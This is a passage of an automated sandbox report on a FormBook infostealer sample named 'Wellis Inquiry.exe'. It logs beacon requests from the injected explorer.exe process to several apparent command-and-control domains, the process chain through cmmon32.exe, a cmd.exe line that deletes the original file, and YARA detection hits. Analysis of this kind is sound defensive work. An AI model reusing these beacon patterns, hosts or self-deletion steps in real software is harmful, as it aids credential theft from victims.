                                                          Host: www.psychedeliccosmetics.com
                                                          Connection: close
                                                          Data Raw: 00 00 00 00 00 00 00
                                                          Data Ascii:
                                                          Oct 14, 2021 07:29:51.303333044 CEST5497INHTTP/1.1 403 Forbidden
                                                          Server: openresty
                                                          Date: Thu, 14 Oct 2021 05:29:51 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 275
                                                          ETag: "615f93b1-113"
                                                          Via: 1.1 google
                                                          Connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          2192.168.2.449818151.106.117.3680C:\Windows\explorer.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Oct 14, 2021 07:29:56.615066051 CEST5654OUTGET /ag9v/?9rq=8aghxAEFV3UFLmLUmwXrjnry4I8PGHpXxFVOvh2n7b9U9R7NlIya57CFUx9pJqwzlAw7&BFQ=5jI0jhMHA0hx_ HTTP/1.1
                                                          Host: www.aceserial.xyz
                                                          Connection: close
                                                          Data Raw: 00 00 00 00 00 00 00
                                                          Data Ascii:
                                                          Oct 14, 2021 07:29:57.113888025 CEST6010INHTTP/1.1 403 Forbidden
                                                          Content-Type: text/html
                                                          Cache-Control: no-cache, no-store, must-revalidate
                                                          Pragma: no-cache
                                                          Expires: 0
                                                          Server: BitNinja Captcha Server
                                                          Date: Thu, 14 Oct 2021 05:29:57 GMT
                                                          Content-Length: 13724
                                                          Connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6a 6f 6f 6d 6c 61 2c 20 4a 6f 6f 6d 6c 61 2c 20 6a 6f 6f 6d 6c 61 20 31 2e 35 2c 20 77 6f 72 64 70 72 65 73 73 20 32 2e 35 2c 20 44 72 75 70 61 6c 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4a 6f 6f 6d 6c 61 21 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4a 6f 6f 6d 6c 61 21 20 31 2e 35 20 2d 20 4f 70 65 6e 20 53 6f 75 72 63 65 20 43 6f 6e 74 65 6e 74 20 4d 61 6e 61 67 65 6d 65 6e 74 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 57 6f 72 64 50 72 65 73 73 20 32 2e 35 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 57 61 69 74 69 6e 67 20 66 6f 72 20 74 68 65 20 72 65 64 69 72 65 63 74 69 72 6f 6e 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 20 7b 77 69 64 74 68 3a 20 31 30 30 25 3b 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 20 6d 61 72 67 69 6e 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 70 61 6e 20 7b 63 6f 6c 6f 72 3a 20 23 38 37 38 37 38 37 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 74 3b 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 63 6f 6c 6f 72 3a 20 23 38 37 38 37 38 37 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 74 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 6c 69 6e 6b 20 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 34 30 70 78 3b 7d 0a 20
                                                          Data Ascii: <!DOCTYPE HTML><html lang="en-US"> <head> <meta charset="UTF-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta name="robots" content="noindex, nofollow" /><meta name="keywords" content="joomla, Joomla, joomla 1.5, wordpress 2.5, Drupal" /><meta name="description" content="Joomla!" /><meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /><meta name="generator" content="WordPress 2.5" /> <meta http-equiv="Content-Type" content="text/html;charset=UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" /> <title>Waiting for the redirectiron...</title> <style type="text/css"> body {background-color: #ffffff; font-family: "Helvetica Neue", Helvetica,Arial,sans-serif;} html, body {width: 100%; height: 100%; margin: 0; padding: 0;} span {color: #878787; font-size: 12pt; text-align: center;} h1 {color: #878787; font-size: 18pt; text-align: center;} .link {margin-top: 40px;}


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          3192.168.2.449841104.21.2.21880C:\Windows\explorer.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Oct 14, 2021 07:30:12.290184021 CEST6071OUTGET /ag9v/?9rq=VDs0Hn8x6Kri7C1Uc2aKLXPFP0feJseWm2OJ8K++Wp+sqWdpvRON2LvjpBxhi0u2NedX&BFQ=5jI0jhMHA0hx_ HTTP/1.1
                                                          Host: www.ebookgratis.online
                                                          Connection: close
                                                          Data Raw: 00 00 00 00 00 00 00
                                                          Data Ascii:
                                                          Oct 14, 2021 07:30:12.313358068 CEST6072INHTTP/1.1 301 Moved Permanently
                                                          Date: Thu, 14 Oct 2021 05:30:12 GMT
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Cache-Control: max-age=3600
                                                          Expires: Thu, 14 Oct 2021 06:30:12 GMT
                                                          Location: https://www.ebookgratis.online/ag9v/?9rq=VDs0Hn8x6Kri7C1Uc2aKLXPFP0feJseWm2OJ8K++Wp+sqWdpvRON2LvjpBxhi0u2NedX&BFQ=5jI0jhMHA0hx_
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=uxw1tsnKlgtB7W5LJtTa5eumSOBk%2BN%2BrDmS98GeIS3mtBU2HXDQ%2Buox4Xes1rOEFZ77hnABAYNvD5o6qlHscVIs9wqr%2BP69MQSOAASVdvEX0AMzTjdkTFWFC%2Fhu%2FOO1BvKLiRR5n%2F3t9"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 69de6a12dc6a5b6e-FRA
                                                          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                          Data Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          4192.168.2.449842199.59.242.15380C:\Windows\explorer.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Oct 14, 2021 07:30:17.527385950 CEST6073OUTGET /ag9v/?9rq=vpuErUH2OwLAPGAltxg3/Zj6XscnxJenLEapnG3NwgRlKVIYyl0HnfsKneQfORBHqYbR&BFQ=5jI0jhMHA0hx_ HTTP/1.1
                                                          Host: www.ovmfinacial.com
                                                          Connection: close
                                                          Data Raw: 00 00 00 00 00 00 00
                                                          Data Ascii:
                                                          Oct 14, 2021 07:30:17.628267050 CEST6074INHTTP/1.1 200 OK
                                                          Server: openresty
                                                          Date: Thu, 14 Oct 2021 05:30:17 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Set-Cookie: parking_session=927c3a40-3c29-567c-15c2-72d0a3410220; expires=Thu, 14-Oct-2021 05:45:17 GMT; Max-Age=900; path=/; HttpOnly
                                                          X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_j7GpDLGaTLJ0rhGNdo+VonizNelzx47mFEL9iz/Okv4QD4XHqfn9OfxM1Dhs8JbXoG2B2KZhqWK371CGAnlIig==
                                                          Cache-Control: no-cache
                                                          Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                          Cache-Control: no-store, must-revalidate
                                                          Cache-Control: post-check=0, pre-check=0
                                                          Pragma: no-cache
                                                          Data Raw: 35 38 39 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6a 37 47 70 44 4c 47 61 54 4c 4a 30 72 68 47 4e 64 6f 2b 56 6f 6e 69 7a 4e 65 6c 7a 78 34 37 6d 46 45 4c 39 69 7a 2f 4f 6b 76 34 51 44 34 58 48 71 66 6e 39 4f 66 78 4d 31 44 68 73 38 4a 62 58 6f 47 32 42 32 4b 5a 68 71 57 4b 33 37 31 43 47 41 6e 6c 49 69 67 3d 3d 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 61 72 6b 69 6e 67 2e 62 6f 64 69 73 63 64 6e 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 22 20 63 72 6f 73 73
                                                          Data Ascii: 589<!doctype html><html lang="en" data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_j7GpDLGaTLJ0rhGNdo+VonizNelzx47mFEL9iz/Okv4QD4XHqfn9OfxM1Dhs8JbXoG2B2KZhqWK371CGAnlIig=="><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="shortcut icon" href="/favicon.ico" type="image/x-icon"/><link rel="preconnect" href="https://www.google.com" crossorigin><link rel="dns-prefetch" href="https://parking.bodiscdn.com" crossorigin><link rel="dns-prefetch" href="https://fonts.googleapis.com" cross


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          5192.168.2.44984723.227.38.7480C:\Windows\explorer.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Oct 14, 2021 07:30:28.510090113 CEST6097OUTGET /ag9v/?9rq=K9/CDnPG5wdyl4CHzmgShg3gLBJ4YNT1Y6jAhZ/FXp8/egWH1BEUOuCtjJEICRxztW+Z&BFQ=5jI0jhMHA0hx_ HTTP/1.1
                                                          Host: www.dollpartyla.com
                                                          Connection: close
                                                          Data Raw: 00 00 00 00 00 00 00
                                                          Data Ascii:
                                                          Oct 14, 2021 07:30:28.557862997 CEST6099INHTTP/1.1 403 Forbidden
                                                          Date: Thu, 14 Oct 2021 05:30:28 GMT
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          X-Sorting-Hat-PodId: 189
                                                          X-Sorting-Hat-ShopId: 59880997054
                                                          X-Request-ID: ff951e54-78cb-49de-931e-6e9b39ead4a9
                                                          X-Permitted-Cross-Domain-Policies: none
                                                          X-XSS-Protection: 1; mode=block
                                                          X-Download-Options: noopen
                                                          X-Content-Type-Options: nosniff
                                                          X-Dc: gcp-europe-west1
                                                          CF-Cache-Status: DYNAMIC
                                                          Server: cloudflare
                                                          CF-RAY: 69de6a78386b698b-FRA
                                                          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                          Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c
                                                          Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:col


                                                          Code Manipulations

                                                          Statistics

                                                          Behavior

                                                          Click to jump to process

                                                          System Behavior

                                                          General

                                                          Start time:07:28:22
                                                          Start date:14/10/2021
                                                          Path:C:\Users\user\Desktop\Wellis Inquiry.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:'C:\Users\user\Desktop\Wellis Inquiry.exe'
                                                          Imagebase:0xff0000
                                                          File size:337408 bytes
                                                          MD5 hash:C357A8010E661A49DF2E813BD22590B6
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET
                                                          Yara matches:
                                                          • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.670890366.0000000003341000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.671146888.0000000004349000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.671146888.0000000004349000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.671146888.0000000004349000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                          Reputation:low

                                                          General

                                                          Start time:07:28:30
                                                          Start date:14/10/2021
                                                          Path:C:\Users\user\Desktop\Wellis Inquiry.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Users\user\Desktop\Wellis Inquiry.exe
                                                          Imagebase:0x6a0000
                                                          File size:337408 bytes
                                                          MD5 hash:C357A8010E661A49DF2E813BD22590B6
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.745846154.0000000001090000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.745846154.0000000001090000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.745846154.0000000001090000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.745321491.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.745321491.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.745321491.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.745670982.0000000000C10000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.745670982.0000000000C10000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.745670982.0000000000C10000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                          Reputation:low

                                                          General

                                                          Start time:07:28:31
                                                          Start date:14/10/2021
                                                          Path:C:\Windows\explorer.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\Explorer.EXE
                                                          Imagebase:0x7ff6fee60000
                                                          File size:3933184 bytes
                                                          MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.715332371.000000000E4B9000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.715332371.000000000E4B9000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.715332371.000000000E4B9000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.699912453.000000000E4B9000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.699912453.000000000E4B9000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.699912453.000000000E4B9000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                          Reputation:high

                                                          General

                                                          Start time:07:29:03
                                                          Start date:14/10/2021
                                                          Path:C:\Windows\SysWOW64\cmmon32.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\SysWOW64\cmmon32.exe
                                                          Imagebase:0x2c0000
                                                          File size:36864 bytes
                                                          MD5 hash:2879B30A164B9F7671B5E6B2E9F8DFDA
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.922603929.0000000002D20000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.922603929.0000000002D20000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.922603929.0000000002D20000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.921975794.0000000000360000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.921975794.0000000000360000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.921975794.0000000000360000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.922486626.0000000002C20000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.922486626.0000000002C20000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.922486626.0000000002C20000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                          Reputation:moderate

                                                          General

                                                          Start time:07:29:07
                                                          Start date:14/10/2021
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:/c del 'C:\Users\user\Desktop\Wellis Inquiry.exe'
                                                          Imagebase:0x11d0000
                                                          File size:232960 bytes
                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          General

                                                          Start time:07:29:07
                                                          Start date:14/10/2021
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff724c50000
                                                          File size:625664 bytes
                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                          Has elevated privileges:true
